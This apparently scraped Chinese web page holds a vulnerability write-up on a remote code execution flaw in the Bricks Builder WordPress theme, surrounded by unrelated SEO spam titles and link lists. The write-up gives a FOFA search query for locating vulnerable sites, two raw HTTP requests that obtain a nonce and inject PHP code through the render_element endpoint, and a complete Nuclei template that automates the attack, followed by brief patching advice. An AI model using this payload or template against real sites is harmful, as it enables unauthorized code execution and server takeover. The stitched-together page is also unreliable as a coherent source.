当前位置: 首页 > news >正文

网站建设除了中企动力中国十大搜索引擎网站

news 2026/1/12 1:43:10
网站建设除了中企动力,中国十大搜索引擎网站,用asp做网站登录页面,怎么做车载mp3下载网站免责声明#xff1a;文章来源互联网收集整理#xff0c;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;所产生的一切不良后果与文章作者无关。该…免责声明文章来源互联网收集整理请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 Ⅰ、漏洞描述 Bricks Builder是一款用于WordPress的开发主题提供直观的拖放界面用于设计和构建WordPress网站。它使用户能够轻松创建自定义的网页布局和设计无需编写或了解复杂的代码。Bricks Builder具有用户友好的界面和强大的功能使用户可以通过简单的拖放操作添加、编辑和排列各种网页元素例如文本框、图像、按钮、导航菜单等。它为WordPress用户提供了一种直观且便捷的方式来构建专业和吸引人的网站无论是个人博客、商业网站还是电子商务平台。 由於函數prepare_query_vars_from_settings 中的一个 eval 函数错误调用導致遠程代碼執行漏洞惡意攻擊者可能會利用此漏洞執行惡意代碼從而獲取服務器權限。 影響版本 Brick Builder 主题在低于 1.9.6 Ⅱ、fofa语句 body/wp-content/themes/bricks/ Ⅲ、漏洞复现 POC-1 GET / HTTP/1.1 Host: 127.0.0.1 POC-2 POST /wp-json/bricks/v1/render_element HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Content-Type: application/json{postId: 1,nonce: dc50d26123,element: {name: container,settings: {hasLoop: true,query: {useQueryEditor: true,queryEditor: throw new Exception(id);,objectType: post}}} } 1、构建 POC获取nonce值 2、使用第一步获取的nonce值构造数据包执行RCE Ⅳ、Nuclei-POC id: WordPres-Bricks-Builder-RCEinfo:name: 由於函數prepare_query_vars_from_settings 中的一个 eval 函数错误调用導致遠程代碼執行漏洞惡意攻擊者可能會利用此漏洞執行惡意代碼從而獲取服務器權限。author: WLFseverity: highmetadata: fofa-query: body/wp-content/themes/bricks/ variables:filename: {{to_lower(rand_base(10))}}boundary: {{to_lower(rand_base(20))}} http:- raw:- |GET / HTTP/1.1Host: {{Hostname}}- |POST /wp-json/bricks/v1/render_element HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: */*Content-Type: application/json{postId: 1,nonce: {{path}},element: {name: container,settings: {hasLoop: true,query: {useQueryEditor: true,queryEditor: throw new Exception(id);,objectType: post}}}}extractors:- type: regexname: pathgroup: 1regex:- nonce:(\w*)internal: truematchers:- type: dsldsl:- status_code200 contains_all(body,Exception,gid,uid) Ⅴ、修复建议 1、关闭互联网暴露面或接口设置访问权限 2、部署WAF对站点路径进行防护 3、将Bricks Builder组件升级只安全版本
http://www.dnsts.com.cn/news/240016.html

相关文章:

  • 做网站 花园路国贸仿36kr wordpress主题
  • 岱山县建设网站一 网站开发体会
  • 装修公司网站建设做水果网站首页的图片素材
  • wordpress添加商城网络营销的优化和推广方式
  • 网站关键词的作用图书网站开发背景
  • 移动端网站建设推广方案做网站可以申请国家补助吗
  • seo外贸仿牌网站换域名衡水做网站的
  • 网站建设服务器都有哪些沈阳cms建站模板
  • 创建网站平台要多少钱vultr一键wordpress
  • 漳州专业做网站怎么去掉wordpress加载动画
  • 杨浦网站建设wordpress短链接清除
  • 网站建设大宇上海网站制作哪家奿
  • 江苏高校品牌专业建设工程网站什么是网站版式
  • 上海网站建设公司指南网站推广服务
  • 电子商务网站建设体会与收获优化大师电视版
  • 网站建设佰金手指科杰二七wordpress弹出式广告
  • 稳定的手机网站设计大庆seo
  • wordpress建站 图片2022年楼市最新政策
  • 专业建材网站建设怎么做网站登录界面
  • 网站建设框架注意事项营业执照官网入口
  • 推进网站 集约化建设seo优化系统哪个好
  • 通过付费网站做lead色块布局网站首页模板
  • 万网域名在中国电信网站备案系统山东省城乡建设厅官网
  • 书香气的域名做网站淘宝网中国站电脑版登录
  • 艺术毕业设计作品网站网站建设费用预算表
  • wep开发和网站开发软件网站开发评估
  • 宁波淘宝网站建设免费提交网址的网站
  • 公司网站开发策略和基本步骤公众号网站怎么建
  • 建设银行网站如何修改账单地址东莞网站建设营销服务平台
  • wordpress多站点怎么修改域名制作微信小程序的教程